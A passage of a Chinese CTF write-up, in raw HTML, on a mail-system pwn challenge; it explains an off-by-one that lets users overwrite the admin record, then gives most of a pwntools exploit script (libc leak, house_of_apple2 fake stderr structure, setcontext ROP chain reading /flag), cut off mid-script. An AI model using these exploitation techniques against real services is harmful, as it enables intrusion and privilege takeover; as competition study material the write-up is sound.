class="cl">0x2C0-0x2E8: 0x28 密码 </span></span><span class="line"><span class="cl">0x308-0x310: 0x8 收件标记 </span></span><span class="line"><span class="cl">0x310-0x318: 0x8 草稿标记 </span></span><span class="line"><span class="cl">0x388-0x390: 0x8 存在标记 </span></span></code></pre></td></tr></table> </div> </div><h4 id="漏洞点利用">漏洞点利用 </h4><p>在注册时有这样的逻辑:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">11</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">i</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x278LL</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">++</span><span class="n">v2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v2</span> <span class="o">&lt;=</span> <span class="mi">7</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">;</span> <span class="o">++</span><span class="n">j</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">j</span> <span class="o">&gt;</span> <span class="mi">12</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mh">0xFFFFFFFFLL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">||</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)(</span><span class="mi">8LL</span> <span class="o">*</span> <span class="n">j</span> <span class="o">+</span> <span class="n">a1</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x388LL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>这里 j 在出 for 循环时可以为 12 ,这样的话可以从用户表越界到管理员表,把管理员的名称和密码都清空,这样就可以直接登录管理员账号了</p> <p>但是要使 j 为 12 ,就要绕过上面对 v2 的大小检验,这要求 <code>*(_QWORD *)(*(_QWORD *)(8LL * i + a1) + 0x278LL)</code> 为 0 而 <code>*(_QWORD *)(*(_QWORD *)(8LL * j + a1) + 0x388LL</code> 不为零,该情况发生的条件是用户被 ban</p> <p>而要想用户被 ban ,根据 secure_check 的逻辑只要在 10 秒内发送超过四次邮件即可</p> <p>于是我们每注册一个用户就 ban 一个,直到填满用户表使溢出发生后即可成为管理员</p> <p>成为管理员后的 mail_user_to_user 中有反向越界读写,可以通过标准流指针泄露 libc 基址,然后通过往 stderr 里面发送 fake_io 信件打 house_of_apple2 ,走 setcontext 去跑 read 再写入 orw_chain</p> <p>比赛时最后十分钟过了本地但是远程炸了,淦,好像是交互时间过长的问题。</p> <h3 id="exp">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./pwn_patched&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;192.0.100.2&#39;</span><span class="p">,</span> <span class="mi">9999</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">### login</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">login</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">pwd</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;name: &#39;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;password: &#39;</span><span class="p">,</span> <span class="n">pwd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">register</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">pwd</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;name: &#39;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;password: &#39;</span><span class="p">,</span> <span class="n">pwd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">myexit</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">### user</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">writemail</span><span class="p">(</span><span class="n">bt</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(1-256): &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">bt</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;bytes):</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">readmail</span><span class="p">(</span><span class="n">choice</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">choice</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">back2menu</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">sendmail</span><span class="p">(</span><span class="nb">id</span><span class="p">,</span> <span class="n">rep</span> <span class="o">=</span> <span class="kc">False</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(input user ID 1-12)&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="nb">id</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">rep</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(y/n): &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;y&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">logout</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;4&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">### admin</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">user2user</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">choice</span><span class="p">,</span> <span class="n">rep</span> <span class="o">=</span> <span class="kc">False</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;4&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;: (1-12) &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">src</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(1-12): &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">dst</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">rep</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(y/n): &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;y&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">choice</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">admin_logout</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;choice: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;5&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">12</span><span class="p">):</span> <span class="c1"># admin</span> </span></span><span class="line"><span class="cl"> <span class="n">register</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;AAA&#39;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">(),</span> <span class="sa">b</span><span class="s1">&#39;BBB&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">login</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;AAA&#39;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">(),</span> <span class="sa">b</span><span class="s1">&#39;BBB&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">i</span> <span class="o">&gt;=</span> <span class="mi">7</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">writemail</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;C&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sendmail</span><span class="p">(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">writemail</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;C&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sendmail</span><span class="p">(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="kc">True</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">writemail</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;C&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sendmail</span><span class="p">(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">logout</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">register</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;AAA&#39;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="mi">13</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">(),</span> <span class="sa">b</span><span class="s1">&#39;BBB&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">login</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">user2user</span><span class="p">(</span><span class="o">-</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">admin_logout</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">login</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;AAA0&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;BBB&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">readmail</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;(new mail):</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> <span class="o">-</span> <span class="mh">0x21b803</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;libc = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">address</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">back2menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">logout</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">stderr</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;_IO_2_1_stderr_&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">pop_rax_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x45eb0</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x2a3e5</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x2be51</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdx_pop_r12_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x11f357</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall_ret</span> <span class="o">=</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="mh">0x91316</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">read_rop_chain</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rsi_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x68</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdx_pop_r12_ret</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x100</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">syscall_ret</span> </span></span><span class="line"><span class="cl"> <span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">fake_io</span> <span class="o">=</span> <span class="n">flat</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x0</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x10</span><span class="p">:</span> <span class="s1">&#39;/flag</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x28</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;setcontext&#39;</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x3d</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x30</span><span class="p">:</span> <span class="n">read_rop_chain</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x70</span><span class="p">:</span> <span class="n">stderr</span> <span class="o">+</span> <span class="mh">0x30</span><span class="p">,</span> <span class="c1"># RSP</span> </span></span><span class="line"><span class="cl"> <span class="mh">0X78</span><span class="p">:</span> <span class="n">pop_rdi_ret</span><span class="p">,</span> <span class="c1"># RIP</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x88</span><span class="p">:</span> <span class="n">stderr</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xA0</span><span class="p">:</span> <span class="n">stderr</span> <span class="o">-</span> <span class="mh">0x30</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xB0</span><span class="p">:</span> <span class="n">stderr</span> <span class="o">-</span> <span class="mh">0x40</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xD8</span><span class="p">:</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;_IO_wfile_jumps&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="n">filler</span><span class="o">=</span><span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x00</span><span class="s2">&#34;</span> </span></span><span class="line"><span 